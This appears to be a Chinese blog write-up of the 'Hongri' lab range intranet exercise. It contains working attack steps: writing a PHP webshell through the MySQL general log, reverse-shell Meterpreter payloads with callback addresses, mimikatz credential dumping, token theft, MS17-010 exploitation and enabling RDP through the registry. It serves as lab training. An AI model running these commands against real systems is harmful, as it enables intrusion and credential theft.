红日靶场1---内网学习

渗透

一句话木马参数使用----测试

Nmap 扫网段

dirsearch -u  http://192.168.20.104/ 扫目录

Phpadmin利用方式---开启日志----使用一句话木马

公告日志中写入一句话木马

Hackbar结合一句话

----------------------------------------------------------------------------------------------------------------------------

默认密码:hongrisec@2019

一.环境搭建

网卡学习

一个网卡一个分段,想象成一个管道

192.168.52一段

192.168.150一段

仅主机模式保证不予外界连通,保证恶意操作不会跑到真实机之上

52段是内部通信,150段属于服务器(win7)与kali通信

任务从win7拿到内部域控

 

 

 开启phpstudy,通过外部访问IP

kali机器试探能否访问

访问成功

 

 搭建成功

--------------------------------------------------------------------------------------------------------------

1.端口扫描

拿到IP扫端口

nmap -p-  192.168.20.104

 2.弱口令检测

root----root

 3.爆破一下web目录

dirsearch -u http://192.168.20.104/

 

尝试登录下面两个路径

 

 

日志导出的模块是关闭的,要把他更改成打开

 

 设置打开

set global general_log = "on"

set global general_log_file="C:/phpStudy/WWW/404.php"

 

设置之后再一次的执行任何操作都会被记录到404这个日志当中

所有运行的指令都会写入到404这个文件中

 

所以我们可以尝试写入一个一句话木马

先尝试一下phpinfo

SELECT "<?php phpinfo();?>"

成功

 

试探路径

 注意公告

加一句话木马

访问路径文件(路径出现的莫名其妙,但是主要是学习内网,不用管)

http://192.168.20.104/yxcms/protected/apps/default/view/default/info.php

 

  用hackbar传输数据,注意hackbar的用法

 测试成功之后哥斯拉上线

路径

http://192.168.20.104/yxcms/protected/apps/default/view/default/info.php

 一个域内用户

getshell之后穿内网

上线MSF

msfdb run 先启动数据库,再启动msf

生成payload

msf6 > use payload/windows/x64/meterpreter/reverse_tcp
set lhost 192.168.52.128 
set lport 5555
generate -f exe -o 64.exe

 第二种生成payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.52.128 lport=5555 -f exe -o 64_2.exe

上传exp

 然后开启监听端口

msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp

 

  执行之后发现回连回来一个shell

监听成功之后会得到一个meterpreter的监听会话

 

进入shell

查看域内信息

net config workstation

 

 修改编码

chcp 65001

查看域控的IP

net time /domain

不知所谓的错误,假设拿到了域控

ping域控之后返回的IP就是域控的IP

出现了两台主机

 

 ping一下又出现了IP

反弹shell之后抓取口令和令牌

本机的hash

 启动mimikaz

load kiwi

执行命令,发现需要管理员权限,提权

可以抓到域内的明文

此处可以先猜测一下这个Administrator是不是域管理员

Administrator  GOD.ORG  hongrisec@2019

怎么去看

进入shell------到c:/-------net group "domain admins" /domain

net group "domain admins" /domain

 发现该管理员就是该域的管理员

然后横向利用CS能够拿下域控

首先尝试偷令牌

选择这个

migrate 2268

偷取完成

然后验证他是不是域管理员,分别访问两个域

然后让他上线

 

use 4

使用第四个

https://huaweicloud.csdn.net/635643e1d3efff3090b5ccfd.html

上线不成功,目前是要了解内网情况

用meterpreter上传fscan文件,在目标机上扫描然后结果返回

这个错误就是要把文件放到指定的文件夹中才能上传

 

 上传成功

fscan64 -h 192.168.52.0/24  

执行扫描命令

 

域控 

两个内网机器

都有MS17-010

search ms17-010

使用漏洞攻击

有一个是32位的服务器,使用漏洞无法攻击成功

设置rhosts=192.168.52.141(内网机器)

 

攻击

成功

 

 成功拿到

下一个使用ms17-010全版本的模块

使用模块2

 设置一下命令和rhost

 

 

很明显此处执行成功之后并且回显

 此时已经拿下了这台服务器

但是把命令修改成连接远程桌面

##开启win 2003 的远程桌面

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

##关闭win 2003 的远程桌面

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

 命令修改为开启远程桌面

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值